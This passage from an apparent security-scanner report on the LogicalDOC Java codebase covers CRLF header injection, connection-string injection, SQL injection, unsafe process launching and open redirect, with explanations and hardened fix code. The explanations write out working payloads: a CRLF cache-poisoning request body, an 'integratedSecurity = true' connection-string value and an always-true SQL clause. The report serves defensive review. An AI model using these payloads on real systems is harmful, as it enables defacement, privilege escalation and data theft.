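Running main() on Linux shows why the two checks are layered: "..\\..\\dblog.log" passes resolveUnderBase there (a backslash is an ordinary character on Linux, so the name stays inside the base directory) but would climb out on Windows, whereas validateFilename rejects it on both. For the SearchServiceImpl findings above, where the input is a saved-query name that becomes name + ".ser", validateFilename on the name alone is the right tool; for getPluginResource, where a resource path with directories is expected, resolveUnderBase is the one to apply to the joined path.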

Java: Incorrect Newline Symbol Filtration in HTTP-response Headers
Severity: high
Language: Java
Short description: The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionHttpResponse.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java
Code:

47            else
48                successUrl.append("?");
49            successUrl.append("tenant=");
50            successUrl.append(session.getTenantName());
51
52            response.setHeader(PARAM_SUCCESSURL, successUrl.toString());
53            response.sendRedirect(successUrl.toString());
54        }
55    }
56}

Attack details:

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
33            Authentication authentication) throws IOException, ServletException {
34        String param = request.getParameter(PARAM_SUCCESSURL);
35        LDAuthenticationToken token = (LDAuthenticationToken) authentication;

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
40        if (param != null) {
41            StringBuffer successUrl = new StringBuffer(param);
42            log.info("Authentication of {} was succesful, redirecting to {}", authentication.getName(), successUrl);

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
51
52            response.setHeader(PARAM_SUCCESSURL, successUrl.toString());
53            response.sendRedirect(successUrl.toString());

Incorrect Newline Symbol Filtration in HTTP-response Headers

If the application builds HTTP response headers from external data without proper filtering, a malicious user can introduce newline characters into a header value. Because HTTP headers are separated by newlines, this lets him inject headers of his own into the server's response.


The HTTP standard defines that headers are separated by the CRLF sequence: CR (0x0D) followed by LF (0x0A). The headers are separated from the response body by a double CRLF.

By inserting CRLF into a response header, the malicious user can shape the response so that the user's browser treats it as two separate responses to one request, with the second one (headers and body) completely under his control.

Example

Let's take a look at a web application that has a public and a private part. To access the private part, the user must authenticate. If an unauthenticated user tries to open a protected resource, he is redirected to the login page, and the address of the page he asked for is kept in the URL parameter next. After successful authentication, the user is sent on to the resource he originally requested by means of a server-side redirect, i.e. a Location header whose target is the value of the next parameter.

The application is served at http://example.com/ behind a reverse proxy that, among other things, caches responses. Authentication requests are handled by an application class containing the methods below.

Note: the user profile is provided by the User class, which is also part of the application. Its id attribute is the session ID that is used to authenticate access to other resources. Authentication is performed by the authenticate() function, which takes a user login and password and returns a User object, or null if authentication fails. HTML form generation is omitted.

Java
@Override
protected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException
{
    String url = req.getParameter( "next" );
    displayLoginPage(resp, url);
}

@Override
protected void doPost( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException
{
    String username = req.getParameter( "user" );
    String password = req.getParameter( "pass" );
    String redirectUrl = req.getParameter( "next" );
    User user = authenticate(username, password);
    if ( user != null ) {
        resp.setStatus( 303 );
        Cookie idCookie = new Cookie( "id", String.valueOf( user.getId() ) );
        idCookie.setMaxAge( 3600 );
        idCookie.setPath( "/" );
        resp.addCookie( idCookie );
        resp.setHeader( "Location", redirectUrl );
    } else {
        resp.getWriter().print( "Authentication failed" );
    }
}

By inserting newline characters into the Location header, the malicious user can mount a cache poisoning attack. First he sends a request with a no-cache directive to the server:

Data
GET / HTTP/1.1
Pragma: no-cache
Host: example.com

The Pragma header tells the caching server to drop the page at the "/" address from its cache. Afterwards, the malicious user makes a POST request with additional headers and a crafted body. We assume that a user named "user1" with the password "pass1" exists in the system.


Data
POST / HTTP/1.1
Host: example.com
Content-Length: 222
Content-Type: application/x-www-form-urlencoded

user=user1&pass=pass1&next=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202020%2014:50:18%20GMT%0d%0aContent-Length:%207%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface!

Note: the space, CR and LF characters in the request body are URL-encoded: CR as %0d, LF as %0a and the space as %20.

In response to this request, the application server sends a redirect using the Location header, whose target is the decoded value of the next parameter:

Data
HTTP/1.1 303 See Other
Content-Type: text/html
Location:
Content-Length: 0

HTTP/1.1 200 OK
Last-Modified: Mon, 27 Oct 2020 14:50:18 GMT
Content-Length: 7
Content-Type: text/html

deface!

Note that although the server sent a single response, the recipient reads it as two separate responses.

In addition, the second response contains the header "Last-Modified: Mon, 27 Oct 2020 14:50:18 GMT", which signals to the caching server that the body of the response may be stored in the cache.

Note: the timestamp in Last-Modified must be later than the server's time at the moment of the request; otherwise the response is not placed in the cache.

The last step of the attack is to make the caching proxy associate this second response with a frequently requested page of the site (such as /welcome). To do this, the malicious user sends a GET request right after the POST request over the same TCP connection. That GET request must ask for the page whose cached copy is to be replaced; in our case, that is the /welcome page.

From now on, the caching proxy answers every request for example.com/welcome from its cache, that is, with the injected second response instead of the real /welcome page.

Potential Consequences

The ability to add HTTP headers that the developer never intended gives the malicious user the opportunity to perform cache poisoning attacks, page hijacking, or cross-site scripting (XSS). In general, exploiting this vulnerability can compromise other users, up to and including the theft of their confidential information.

Removal Recommendations

• When doing client-side user input checking, make sure that the same checks are also done on the server side, since the malicious user can modify data after it has passed the client-side checks. Also make sure that the server-side and client-side checks use the same encoding;

• Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the "accept known good" method for input filtering, such as a whitelist that describes the acceptable input format. All input that does not follow the format described in the whitelist should be rejected. If the input data is a URL, check that it is a valid URL;

• If user data is used to generate header names or values, ensure that all special HTTP characters that the malicious user could use to alter the HTTP response are escaped according to URL encoding rules. Using this approach, the doPost() function from the example can be rewritten as follows:

Java
@Override
protected void doPost( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException
{
    String username = req.getParameter( "user" );
    String password = req.getParameter( "pass" );
    String redirectUrl = req.getParameter( "next" );
    User user = authenticate(username, password);
    if ( user != null ) {
        resp.setStatus( 303 );
        Cookie idCookie = new Cookie( "id", String.valueOf( user.getId() ) );
        idCookie.setMaxAge( 3600 );
        idCookie.setPath( "/" );
        resp.addCookie( idCookie );
        resp.setHeader( "Location", URLEncoder.encode( redirectUrl, "UTF-8" ) );
    } else {
        resp.getWriter().print( "Authentication failed" );
    }
}
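The following is an added example (not code from the report or from LogicalDOC) that applies the whitelist recommendation to the same doPost(): any header value built from request data is rejected if it contains CR, LF or NUL, and the next parameter is accepted only as a site-local path, because URLEncoder.encode() applied to a complete URL would also encode its ':' and '/' characters. User and authenticate() are left abstract here, standing in for the article's own; DEFAULT_TARGET is an assumption.

```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Added example (not from the report or the scanned project): the login servlet
// from the article, with request data validated before it reaches any header.
public abstract class LoginServlet extends HttpServlet {

    /** Stands in for the article's User class. */
    public interface User {
        long getId();
    }

    /** Stands in for the article's authenticate(): a User on success, null otherwise. */
    protected abstract User authenticate(String username, String password);

    /** Assumed fallback when "next" is missing or not acceptable. */
    private static final String DEFAULT_TARGET = "/welcome";

    /**
     * Every header value built from request data goes through here. CR, LF and NUL
     * are the characters that end a header line or the header block; rejecting
     * them (instead of silently stripping) keeps the attempt visible in logs.
     */
    static String requireSafeHeaderValue(String name, String value) {
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            if (c == '\r' || c == '\n' || c == '\0') {
                throw new IllegalArgumentException("control character in header " + name);
            }
        }
        return value;
    }

    /**
     * "Accept known good" for the redirect target: a site-local path only.
     * Absolute URLs, protocol-relative "//host", backslashes and anything outside
     * printable ASCII fall back to DEFAULT_TARGET. Validation is used instead of
     * URLEncoder.encode() on the whole value, since that would also encode the
     * ':' and '/' of a legitimate URL.
     */
    static String safeLocalTarget(String next) {
        if (next == null || next.length() > 2048
                || !next.startsWith("/") || next.startsWith("//")) {
            return DEFAULT_TARGET;
        }
        for (int i = 0; i < next.length(); i++) {
            char c = next.charAt(i);
            if (c < 0x21 || c > 0x7e || c == '\\') {
                return DEFAULT_TARGET;
            }
        }
        return next;
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String username = req.getParameter("user");
        String password = req.getParameter("pass");
        // Validated once, before anything is written to the response.
        String redirectUrl = safeLocalTarget(req.getParameter("next"));

        User user = authenticate(username, password);
        if (user != null) {
            resp.setStatus(HttpServletResponse.SC_SEE_OTHER);
            Cookie idCookie = new Cookie("id", String.valueOf(user.getId()));
            idCookie.setMaxAge(3600);
            idCookie.setPath("/");
            idCookie.setHttpOnly(true); // the session id is not needed by scripts
            resp.addCookie(idCookie);
            resp.setHeader("Location", requireSafeHeaderValue("Location", redirectUrl));
        } else {
            resp.getWriter().print("Authentication failed");
        }
    }
}
```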

Java: Incorrect user data filtration when forming a connection string to the data source
Severity: high
Language: Java
Short description: When generating a connection string to the data source, using external data without proper filtering can lead to the malicious user manipulating database connection parameters.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionConnectionString.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

130    }
131
132    protected void doConnection() {
133        try {
134            Class.forName(driver);
135            con = DriverManager.getConnection(url, username, password);
136            con.setAutoCommit(true);
137        } catch (Exception ex) {
138            log.error(ex.getMessage(), ex);
139        }
140    }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB
227        init.setDriver(info.getDbDriver());
228        init.setUrl(info.getDbUrl());
229        init.setUsername(info.getDbUsername());

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::setUrl
184    public void setUrl(String url) {
185        this.url = url;
186    }

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::doConnection
134            Class.forName(driver);
135            con = DriverManager.getConnection(url, username, password);
136            con.setAutoCommit(true);

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

165    public boolean testConnection() {
166        boolean result = false;
167
168        try {
169            Class.forName(driver);
170            con = DriverManager.getConnection(url, username, password);
171            result = true;
172            con.close();
173        } catch (Exception ex) {
174            log.error(ex.getMessage(), ex);
175        }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB
227        init.setDriver(info.getDbDriver());
228        init.setUrl(info.getDbUrl());
229        init.setUsername(info.getDbUsername());

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::setUrl
184    public void setUrl(String url) {
185        this.url = url;
186    }

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::testConnection
169            Class.forName(driver);
170            con = DriverManager.getConnection(url, username, password);
171            result = true;

Incorrect user data filtration when forming a connection string to the data source


When generating a connection string to the data source, using external data without proper filtering can lead to the malicious user manipulating database connection parameters.

Example

Let’s take a look at an application that gives the user an interface to some database. Suppose the application uses DBMS authentication and authorization mechanisms. Therefore, the application receives user account details and passes them to the DBMS server, which then authorizes the user for certain actions according to server policies. In order to send the authorization request, the application has to form a connection string. Let’s now take a look at a code fragment that does precisely that:

Java
public Connection getConnection(String user, String password) throws SQLException {
    Connection conn = null;
    conn = DriverManager.getConnection(
                    "jdbc:sqlserver://;servername=server_name; " +
                    "integratedSecurity=false;" +
                    "user=" + user + "; " +
                    "password =" + password + ";"
        );
    System.out.println("Connected to database");
    return conn;
}

If the values of the user and password variables are not checked for escape characters, the malicious user can pass the following string as a password:

Data
pwd; integratedSecurity = true;

Then the value of integratedSecurity will be set to true. Therefore, the DBMS will use OS or webserver account data to authorize this user. This gives the malicious user DB administration rights, regardless of the server policies.

Potential consequences

Depending on the DBMS used, this vulnerability can have a variety of consequences. For example, with MS SQL Server:

• The malicious user can gain DB administrator privileges, which compromises the database;

• By varying the value of the port parameter of the connection string, the malicious user can scan the DB server ports, which are usually the application ports;

• By changing the serverName parameter to a previously prepared server, together with the integratedSecurity parameter, the malicious user can obtain the password hash of the application server's user account.

Removal recommendations

We need to assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected.
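As an added example (not code from the report or from LogicalDOC), the getConnection() function from the example above rewritten so that the DBMS address is fixed in the application, the login name is whitelisted, and user and password are passed to the driver as separate properties rather than concatenated into the connection string. JDBC_URL and the login-name pattern are assumptions for a SQL Server deployment.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Properties;
import java.util.regex.Pattern;

// Added example (not from the report or the scanned project): the login data is
// handed to the JDBC driver as separate properties, so no part of it is ever
// parsed as connection-string syntax.
public final class DbLogin {

    /** Assumed, fixed location of the DBMS; never derived from request data. */
    private static final String JDBC_URL =
            "jdbc:sqlserver://db.internal.example:1433;databaseName=app";

    /** "Accept known good": the login-name format this deployment allows (assumed). */
    private static final Pattern LOGIN_NAME = Pattern.compile("^[A-Za-z][A-Za-z0-9_]{0,63}$");

    static boolean isAllowedLoginName(String user) {
        return user != null && LOGIN_NAME.matcher(user).matches();
    }

    public static Connection getConnection(String user, String password) throws SQLException {
        if (!isAllowedLoginName(user)) {
            throw new IllegalArgumentException("login name does not match the allowed format");
        }
        if (password == null || password.isEmpty() || password.length() > 128) {
            throw new IllegalArgumentException("password missing or too long");
        }
        Properties props = new Properties();
        props.setProperty("user", user);
        // A password such as "pwd; integratedSecurity = true;" (the string from the
        // example above) is just a wrong password here: the driver receives it as
        // the value of one property, not as text to be split on ';' and '='.
        props.setProperty("password", password);
        // Security-relevant switches are set by the application, never by the client.
        props.setProperty("integratedSecurity", "false");
        props.setProperty("encrypt", "true");
        return DriverManager.getConnection(JDBC_URL, props);
    }
}
```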

Java: Incorrect user input filtration during SQL request generation
Severity: high
Language: Java
Short description: If the application uses external data when generating SQL requests, and that data is not filtered, or is filtered improperly, the malicious user can manipulate the requests.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionSql.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

83     * @param sql The SQL to execute
84     */
85    public void executeSql(String sql) {
86        try {
87            doConnection();
88            PreparedStatement st = con.prepareStatement(sql);
89            st.execute();
90            st.close();
91        } catch (Throwable e) {
92            log.error(e.getMessage(), e);
93            log.error("Failed to execute " + sql, e);

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB
206                && !info.getDbEngine().toLowerCase().contains("hsqldb")) {
207            String dbName = info.getDbUrl().substring(info.getDbUrl().lastIndexOf('/') + 1);
208            String adminjdbcUrl = info.getDbUrl().substring(0, info.getDbUrl().lastIndexOf('/'));

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB
218                    if (init.testConnection())
219                        init.executeSql("create database " + dbName);
220                } catch (Throwable t) {

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::executeSql
87            doConnection();
88            PreparedStatement st = con.prepareStatement(sql);
89            st.execute();

Incorrect user input filtration during SQL request generations

If the application uses external data when generating SQL requests, and that data is not filtered, or is filtered improperly, the malicious user can manipulate the requests.

As a result, the malicious user has read access to the database. If the system is compromised enough, the user might even get write/delete access to the information in the DBMS. Many DBMS also support file system operations, network operations, and OS commands, which gives the malicious user access to those as well, with careful SQL request crafting.

Example 1

Let's take a look at a servlet code fragment that searches the database for items of a given type. The selection is limited to the items that the currently authenticated user has access to.

Java
public class GetItemsServlet extends HttpServlet {
    public void doPost(HttpServletRequest request, HttpServletResponse response)
    {
        ...
        Connection con = getSqlConnection();
        Statement stmt = null;
        String query = "SELECT * FROM items WHERE " +
            "user = \"" + request.getParameter("user") + " AND " +
            "itemtype =" + request.getParameter("itemtype") + ";";
        try {
            stmt = con.createStatement();
            ResultSet rs = stmt.executeQuery(query);
            while (rs.next()) {
                // result process and listing
            }
        } catch (SQLException e ) {
            printSQLException(e);
        } finally {
            if (stmt != null) { stmt.close(); }
        }
    }
}

After the input parameters are processed, the following SQL query will be generated:

Sql
SELECT * FROM items
WHERE user = <userName>
AND itemtype = <itemType>;

However, since the query itself is generated from the user input, as well as program code, this query will be correct only if the user entered the right data. The malicious user can pass the following values to the program:

Data
userNameField: "SomeUserName"
itemTypeField: "name OR 'a'='a'"

Then the query will look like this:

Sql
SELECT * FROM items
WHERE user = SomeUserName
AND itemType = name OR 'a'='a';

Since the expression 'a'='a' is always true, the entire expression in the WHERE clause is always true. Therefore, the generated query is functionally identical to:

Sql
SELECT * FROM items;

In other words, the malicious user now has access to all items, without being limited by user access rights.

Example 2

The Spring framework contains the JdbcTemplate class, which deals with SQL queries. This class has several methods that run SQL queries, taking different argument types and returning different kinds of objects. We can rewrite the above example using this class:

Note: the getDataSource function is not standard. It creates the connection to the database and returns an object of the DataSource type.

Java
public class GetItemsServlet extends HttpServlet {
    public void doPost(HttpServletRequest request, HttpServletResponse response)
    {
        ...
        JdbcTemplate jdbcTemplate = new JdbcTemplate(getDataSource());
        // the query text is still built by concatenating request parameters
        String query = "SELECT * FROM items WHERE " +
            "user = \"" + request.getParameter("user") + " AND " +
            "itemtype =" + request.getParameter("itemtype") + ";";
        try {
            List<Map<String, Object>> rs = jdbcTemplate.queryForList(query);
            for (Map<String, Object> row : rs) {
                // processing objects and listing
            }
        } catch (DataAccessException e ) {
            printSQLException(e);
        }
    }
}

Example 3

The Hibernate framework is designed specifically for establishing a connection between the application and the DBMS. Hibernate automates SQL query generation, and frees up the developer from having to process the data result sets and to transform objects manually. However, if the developer is using the given API incorrectly, the application can be vulnerable to SQL injection attacks [4]. For example:

Java
String table = request.getParameter("table");
String item = request.getParameter("item");

Session session = sessionFactory.getCurrentSession();
try {
    session.beginTransaction();
    // the table name is concatenated into the query text; only the value is bound as a parameter
    SQLQuery query = session.createSQLQuery("SELECT * FROM " + table + " WHERE stuff = ?");
    query.setParameter(0, item);
    query.list();
    session.getTransaction().commit();
} catch (Exception e) {
}
session.close();

In this case, the SQL query is generated using a prepared query. However, the injection can still happen through the table parameter.

Potential consequences

The possibility of injecting SQL operators can lead to read/write/delete access to confidential information, stored in the database.

Many DBMS have support for file system operations, network operations, as well as OS commands. An SQL injection can grant the malicious user access to these operations.

Removal recommendations

• We recommend against using dynamic SQL queries. Instead, use object-level mechanisms that automatically generate secure queries;

• Follow the usage recommendations of the API developers. Almost every one of the aforementioned libraries supports the classic SQL injection protection: prepared queries. This mechanism lets you generate dynamic SQL queries without being exposed to the threat of injection. Therefore, we recommend using prepared queries and strongly recommend against string concatenation. Example 1 can be rewritten as follows using prepared queries:

Java
public class GetItemsServlet extends HttpServlet {
    public void doPost(HttpServletRequest request, HttpServletResponse response)
    {
        ...
        Connection con = getSqlConnection();
        PreparedStatement stmt = null;
        String query = "SELECT * FROM items WHERE " + "user = ? AND itemtype = ?;";
        try {
            stmt = con.prepareStatement(query);
            // each parameter is bound to its own placeholder, so its value is never parsed as SQL
            stmt.setString(1, request.getParameter("user"));
            stmt.setString(2, request.getParameter("itemtype"));
            ResultSet rs = stmt.executeQuery();
            while (rs.next()) {
                // process results and list
            }
        } catch (SQLException e ) {
            printSQLException(e);
        } finally {
            if (stmt != null) { stmt.close(); }
        }
    }
}

• If string concatenation during SQL query generation is unavoidable, do not use user input data in it, or at least validate that data thoroughly.

• Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the "accept known good" method for input filtering, such as a whitelist that describes the acceptable input format. All input that does not follow the format described in the whitelist should be rejected. For example, if the expected input is an integer, convert the input to an integer type;

• Whitelist-based input validation cannot always guarantee security. If the input may contain SQL escape characters, it must be escaped or encoded.

• For the MySQL DBMS, the characters \, ", ', \0 (NUL), \r (carriage return), \n (new line), \t (tab), %, _, \b (backspace) and \x1A (substitute) must be escaped with a backslash. For example, "O'Henry" turns into "O\'Henry".
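For the case the scanner flagged above, "create database " + dbName, and for the Hibernate table-name example, placeholders cannot be used because the untrusted value is an identifier rather than a data value. The following added example (not code from the report or from LogicalDOC) shows the whitelist approach for identifiers: validate against a strict pattern, optionally restrict to a fixed set of names, and quote with the driver's own identifier quote character; QUERYABLE_TABLES is an assumption.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.Set;
import java.util.regex.Pattern;

// Added example (not from the report or the scanned project): identifiers such as
// a database or table name cannot be bound as "?" parameters, so they are
// whitelisted and quoted before being concatenated into the statement text.
public final class SafeIdentifiers {

    /** Unquoted identifier: a letter or underscore, then letters, digits or underscores, 64 chars max. */
    private static final Pattern IDENTIFIER = Pattern.compile("^[A-Za-z_][A-Za-z0-9_]{0,63}$");

    /** Assumed: the only tables this code may query. A well-formed name outside the set is still rejected. */
    private static final Set<String> QUERYABLE_TABLES = Set.of("items", "orders");

    /**
     * Whitelist check, then quoting with the quote string the driver reports, so
     * that the name is read as an identifier and never as SQL syntax.
     */
    public static String quoteIdentifier(Connection con, String name) throws SQLException {
        if (name == null || !IDENTIFIER.matcher(name).matches()) {
            throw new IllegalArgumentException("identifier does not match the allowed format");
        }
        String q = con.getMetaData().getIdentifierQuoteString();
        if (q == null || q.trim().isEmpty()) {
            // Driver reports no quoting support; the pattern already excludes quote characters.
            return name;
        }
        return q + name + q;
    }

    /** The flagged "create database " + dbName, done with a validated and quoted name. */
    public static void createDatabase(Connection con, String dbName) throws SQLException {
        String sql = "CREATE DATABASE " + quoteIdentifier(con, dbName);
        try (Statement st = con.createStatement()) {
            st.execute(sql);
        }
    }

    /** The Hibernate case: table from the allowlist, row filter bound as a parameter. */
    public static int countRows(Connection con, String table, String stuff) throws SQLException {
        if (table == null || !QUERYABLE_TABLES.contains(table)) {
            throw new IllegalArgumentException("table is not queryable");
        }
        String sql = "SELECT COUNT(*) FROM " + quoteIdentifier(con, table) + " WHERE stuff = ?";
        try (PreparedStatement ps = con.prepareStatement(sql)) {
            ps.setString(1, stuff);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getInt(1) : 0;
            }
        }
    }
}
```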

Java: Incorrect user input filtration when passing control to external components
Severity: high
Language: Java
Short description: This vulnerability occurs when the application loads an external module or library without pointing to the full path to the executable. When loading a file using a relative path, the system searches for it in directories, the order of which depends on the operating system. If the user can write a file into a directory that has a higher search priority than the actual path, or can access environment variables, he can replace the executable with a malicious one.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionProcessCreation.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/exec/Exec.java
Code:

157     * Execute the command by using the Runtime.exec
158     */
159    public static int exec(final String commandLine, String[] env, File dir, int timeout) throws IOException {
160        int exit = 0;
161
162        final Process process = Runtime.getRuntime().exec(commandLine, env, dir);
163
164        if (timeout > 0) {
165            ExecutorService service = Executors.newSingleThreadExecutor();
166            try {
167                Callable<Integer> call = new CallableProcess(process);


File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/exec/WinUtil.java
Code:

7    private static final String TASKLIST = "tasklist";
8
9    private static final String KILL = "taskkill /IM ";
10
11    public static boolean isProcessRunning(String serviceName) throws Exception {
12        Process p = Runtime.getRuntime().exec(TASKLIST);
13        BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
14        String line;
15        while ((line = reader.readLine()) != null) {
16            if (line.toLowerCase().contains(serviceName.toLowerCase())) {
17                return true;

Incorrect user input filtration when passing control to external components

This vulnerability occurs when the application loads an external module or library without pointing to the full path to the executable. When loading a file using a relative path, the system searches for it in directories, the order of which depends on the operating system. If the user can write a file into a directory that has a higher search priority than the actual path, or can access environmental variables, he can replace the executable with a malicious one.

Example

In this example, we take a look at a code fragment, where the program loads an external library without giving its full path:

Java
System.loadLibrary("library.dll");

The user can create a file called library.dll and place it in a directory with a higher search priority than the target one. The program will load the malicious file into its context and execute it with its own privileges. This grants the user control over the system.

Potential consequences

This vulnerability lets the user execute any commands with the privileges of the application process.

Removal recommendations

When launching external modules using a call to Runtime.exec(), ProcessBuilder.start() and System.loadLibrary(), we recommend you use the absolute path to the executable file, and check it for integrity before launch.
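An added example (not code from the report or from LogicalDOC) of the recommendation above for Runtime.exec()-style launches such as the flagged Exec.exec() and WinUtil: the tool is addressed by absolute path, its SHA-256 is compared with a configured digest before start, arguments are passed as an explicit argv list rather than a command-line string, and the environment is not inherited. TOOL and TOOL_SHA256 are placeholders; Java 9 or later is assumed for Redirect.DISCARD.

```java
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeUnit;

// Added example (not from the report or the scanned project): run an external tool
// by absolute path, after an integrity check, with an explicit argument vector.
public final class VerifiedExec {

    /** Placeholders to be set per deployment: absolute path of the tool and its expected SHA-256. */
    private static final Path TOOL = Paths.get("/opt/app/bin/convert-tool");
    private static final String TOOL_SHA256 = "<expected sha-256 hex digest>";

    static String sha256Hex(Path file) throws IOException {
        MessageDigest md;
        try {
            md = MessageDigest.getInstance("SHA-256");
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 not available", e);
        }
        try (InputStream in = Files.newInputStream(file)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) {
                md.update(buf, 0, n);
            }
        }
        StringBuilder hex = new StringBuilder();
        for (byte b : md.digest()) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }

    /**
     * Runs TOOL with the given arguments. Unlike Runtime.exec(String, ...), nothing
     * here is tokenised: each list element becomes exactly one argv entry.
     */
    public static int run(List<String> args, File workDir, long timeoutSeconds)
            throws IOException, InterruptedException {
        if (!TOOL.isAbsolute()) {
            throw new IllegalStateException("tool path must be absolute: " + TOOL);
        }
        // Integrity check. The directory holding TOOL must not be writable by the
        // application user, otherwise the file could still change between this
        // check and start().
        String actual = sha256Hex(TOOL);
        if (!actual.equalsIgnoreCase(TOOL_SHA256)) {
            throw new SecurityException("integrity check failed for " + TOOL + ": " + actual);
        }
        List<String> cmd = new ArrayList<>();
        cmd.add(TOOL.toString());
        cmd.addAll(args);

        ProcessBuilder pb = new ProcessBuilder(cmd).directory(workDir);
        // Do not inherit the caller's environment; give the child only what it needs.
        Map<String, String> env = pb.environment();
        env.clear();
        env.put("PATH", "/usr/bin:/bin");
        env.put("LANG", "C");
        // Discard output so a chatty tool cannot block on a full pipe (Java 9+).
        pb.redirectErrorStream(true);
        pb.redirectOutput(ProcessBuilder.Redirect.DISCARD);

        Process p = pb.start();
        if (!p.waitFor(timeoutSeconds, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            throw new IOException("timed out after " + timeoutSeconds + "s: " + TOOL);
        }
        return p.exitValue();
    }
}
```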

Java: Redirecting the user to a malicious site
Severity: high
Language: Java
Short description: If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionRedirect.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java
Code:

47            else
48                successUrl.append("?");
49            successUrl.append("tenant=");
50            successUrl.append(session.getTenantName());
51
52            response.setHeader(PARAM_SUCCESSURL, successUrl.toString());
53            response.sendRedirect(successUrl.toString());
54        }
55    }
56}

Attack details:

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
33            Authentication authentication) throws IOException, ServletException {
34        String param = request.getParameter(PARAM_SUCCESSURL);
35        LDAuthenticationToken token = (LDAuthenticationToken) authentication;

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
40        if (param != null) {
41            StringBuffer successUrl = new StringBuffer(param);
42            log.info("Authentication of {} was succesful, redirecting to {}", authentication.getName(), successUrl);

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
51
52            response.setHeader(PARAM_SUCCESSURL, successUrl.toString());
53            response.sendRedirect(successUrl.toString());

